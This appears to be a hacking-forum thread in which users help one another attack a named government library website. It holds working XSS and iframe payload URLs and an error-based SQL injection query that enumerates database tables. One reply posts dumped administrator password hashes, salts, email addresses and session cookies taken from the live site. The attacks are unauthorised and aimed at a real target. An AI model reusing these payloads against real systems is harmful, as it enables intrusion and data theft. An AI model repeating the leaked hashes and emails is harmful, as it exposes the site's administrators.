SQLi help needed :'(

[NIIGHT HAWKE]

Sir(s) , i'm so sorry for making a thread with asking help :'( i've found sql vulnerability with this site -= >

Code: Select all

http://www.nlm.gov.mm/index.php?catid=1%27&id=88%3Adigitalization-project&Itemid=50&lang=mm&option=com_content&view=article

but i can't inject :'( would u plz tell me the reason sir(s) :(

[Cool_Fire]

It does look like it'll be SQL injectable. I'll admit I'm not great with that though. It's also vulnerable to XSS and LFI btw.

XSS:

Code: Select all

http://www.nlm.gov.mm/index.php?catid=<script>alert(String.fromCharCode(88,83,83));</script> 1--&id=88:digitalization-project&Itemid=50&lang=mm&option=com_content&view=article

(Doesn't work in Chrome 19, does in FF 13)

LFI:

Code: Select all

http://www.nlm.gov.mm/index.php?catid=%3Ciframe%20src=index.php%3E%3C/iframe%3E%201--&id=88:digitalization-project&Itemid=50&lang=mm&option=com_content&view=article

[NIIGHT HAWKE]

thank u sir :) would u plz tell me sir how can i inject on that site , sir :(

[Cool_Fire]

I'm not sure. If I had come across a way that works, I'd have posted it along with the LFI and XSS examples.

[NIIGHT HAWKE]

thanku sir :) sir .. is thre any way to obtain username on blind sql , shourtcourt sir ..?

[NIIGHT HAWKE]

sir :( i dont knw how to obtain table names in version 4 sir :'(

[Cool_Fire]

Blind SQL injection is always difficult. If you want to get table names, you need to inject a 'SHOW TABLES' statement and you need to get the output from this statement somehow.

[NIIGHT HAWKE]

sir , would u plz show me the query ? Plz sir :(

[Cool_Fire]

Perhaps I've not made this sufficiently clear before: I do not know.

It does look like it'll be SQL injectable. I'll admit I'm not great with that though.

[NIIGHT HAWKE]

sry sir :'( i'm asking for the query , can obtain tables in sql website's version 4 sir :'(

[Cool_Fire]

And I'm telling you I don't know. The SQL query to show tables is just SHOW TABLES. But I do not know how you get that website to execute it and show you the result.

If you want to get table names, you need to inject a 'SHOW TABLES' statement

[NIIGHT HAWKE]

thankx for helping me sir :)

[w0rd]

The site IS vulnerable to SQL injection, but it's error based and pretty advanced.

For example, here's the querty to get the first table:

Code: Select all

http://www.nlm.gov.mm/index.php?id=88:Adigitalization-project&Itemid=50&lang=mm&option=com_content&view=article&catid=1 and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,table_name,0x27,0x7e) from `information_schema`.tables where table_schema=0x3434343038365F6E6C6D limit 0,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

In the SQL Error you'll see that it shows the table "jos_banner"

You can continue to enumerate them, but I'd reccomend an automated program because this could take some time.

::EDIT::

I went ahead and retrieved the contents of jos_users - unforunately the table is empty so there's not much to find there. =/

[Cool_Fire]

Nicely done.

[wombraider]

hey ... got you the admin and some sort of wieeerd pw stuffs... wont edit the dump since im confused about the 3rd set of hash.

pm me if you want tablestructure :)

Spoiler: show

usertype password email username
Administrator c60aee560b7db702fb6e93cbf238f6ec:5s30sVk4EEPLmZ0ge9V5yaPvCa1fR' for key 1 SQL=SELECT * FROM `jos_categories` WHERE `id`=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,jos_users.password,0x27,0x7e) from `444086_nlm`.jos_users Order by usertype limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 AND `section` = 11 Expires: Mon, 1 Jan 2001 00:00:00 GMT Pragma: no-cache Connection: close Set-Cookie: X-Mapping-nbjnphkm=2777EB784C77E0D945C1F036F6C0D23F; path=/ Set-Cookie: 0e0ed937d571ce3dcfd0d4925fc4d2a7=420f3jukk5ld3pgaiptapcfuo3; path=/ Set-Cookie: lang=deleted; expires=Sun, 17-Jul-2011 17:38:44 GMT; path=/ Set-Cookie: jfcookie=deleted; expires=Sun, 17-Jul-2011 17:38:44 GMT; path=/ Set-Cookie: jfcookie[lang]=mm; expires=Tue, 17-Jul-2012 17:38:45 GMT; path=/ Set-Cookie: X-Mapping-nbjnphkm=2777EB784C77E0D945C1F036F6C0D23F; path=/ Last-Modified: Mon, 16 Jul 2012 17:38:46 GMT Content-Length: 2400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="ltr"> <head> <title>500 - အမှား: 500</title> <link rel="stylesheet" href="/templates/system/css/error.css" type="text/css" /> </head> <body> <div align="center"> <div id="outline"> <div id="errorboxoutline"> <div id="errorboxheader">500 - No valid database connection:Duplicate entry kmhnlm.myanmar@gmail.com
Super Administrator 2e12eeb8af6ecdef130a3de291f01d59:AoS2M3fhoPnkkSrGHb7gnnT5d6Pxd' for key 1 SQL=SELECT * FROM `jos_categories` WHERE `id`=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,jos_users.password,0x27,0x7e) from `444086_nlm`.jos_users Order by usertype limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 AND `section` = 11 Expires: Mon, 1 Jan 2001 00:00:00 GMT Pragma: no-cache Connection: close Set-Cookie: X-Mapping-nbjnphkm=6CC299B5A1A8A4E6CF793EE4E1A18529; path=/ Set-Cookie: 0e0ed937d571ce3dcfd0d4925fc4d2a7=a7nk9hk5b32n57ujaq5vkaopn5; path=/ Set-Cookie: lang=deleted; expires=Sun, 17-Jul-2011 17:38:56 GMT; path=/ Set-Cookie: jfcookie=deleted; expires=Sun, 17-Jul-2011 17:38:56 GMT; path=/ Set-Cookie: jfcookie[lang]=mm; expires=Tue, 17-Jul-2012 17:38:57 GMT; path=/ Set-Cookie: X-Mapping-nbjnphkm=6CC299B5A1A8A4E6CF793EE4E1A18529; path=/ Last-Modified: Mon, 16 Jul 2012 17:38:58 GMT Content-Length: 2400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="ltr"> <head> <title>500 - အမှား: 500</title> <link rel="stylesheet" href="/templates/system/css/error.css" type="text/css" /> </head> <body> <div align="center"> <div id="outline"> <div id="errorboxoutline"> <div id="errorboxheader">500 - No valid database connection:Duplicate entry team@medialane.net